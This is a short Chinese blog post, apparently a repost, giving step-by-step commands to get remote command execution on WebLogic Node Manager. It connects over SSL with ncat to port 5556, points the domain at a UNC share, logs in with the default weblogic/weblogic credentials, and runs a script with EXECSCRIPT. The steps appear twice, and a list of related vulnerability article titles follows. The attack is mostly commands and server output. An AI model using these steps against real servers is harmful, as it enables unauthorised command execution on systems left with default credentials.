weblogic node maanger 远程命令执行漏洞
2011-10-19 10:56
609 查看
1.找到5556的SSL端口
ncat --ssl ip 5556
输出HELLO
+OK Node manager v10.3 started
2.设置domain
DOMAIN my_domain \\ip\c$
+OK Current domain set to 'my_domain'
3.USER weblogic
PASS weblogic
4.执行命令
EXECSCRIPT 1.sh
参考资料:
http://book.51cto.com/art/201110/295927.htm
http://guanting.com/security/bug/information/3343.html
ncat --ssl ip 5556
输出HELLO
+OK Node manager v10.3 started
2.设置domain
DOMAIN my_domain \\ip\c$
+OK Current domain set to 'my_domain'
3.USER weblogic
PASS weblogic
4.执行命令
EXECSCRIPT 1.sh
参考资料:
http://book.51cto.com/art/201110/295927.htm
http://guanting.com/security/bug/information/3343.html
相关文章推荐
- WebLogic Server WLS组件远程命令执行漏洞入侵挖矿事件
- Linux系统服务器 GNU Bash 环境变量远程命令执行漏洞修复命令
- Struts2远程命令执行漏洞 S2-045 源码分析
- Apache Struts2 多个前缀参数远程命令执行漏洞及测试方法
- 漏洞修复之 bash漏洞远程命令执行
- 利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果
- Struts2远程命令执行漏洞分析及防范
- 修复Strtus远程命令执行漏洞 : Strtus 2.2.3 升级到 Strtus 2.3.24
- 利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果
- Bash远程解析命令执行漏洞测试方法
- CVE-2017-8464 远程命令执行漏洞复现
- Microsoft Internet Explorer SP2远程任意命令执行漏洞
- Struts2 REST插件远程执行命令漏洞全面分析,WAF支持检测防御
- 【S2-053】Struts2远程命令执行漏洞(CVE-2017-12611)
- 利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果
- "Java 反序列化"过程远程命令执行漏洞
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- struts2远程命令执行漏洞S2-045
- CVE-2017-8464远程命令执行漏洞复现
- 网站安全加固之apache环境S2-057漏洞 利用POC 远程执行命令漏洞复现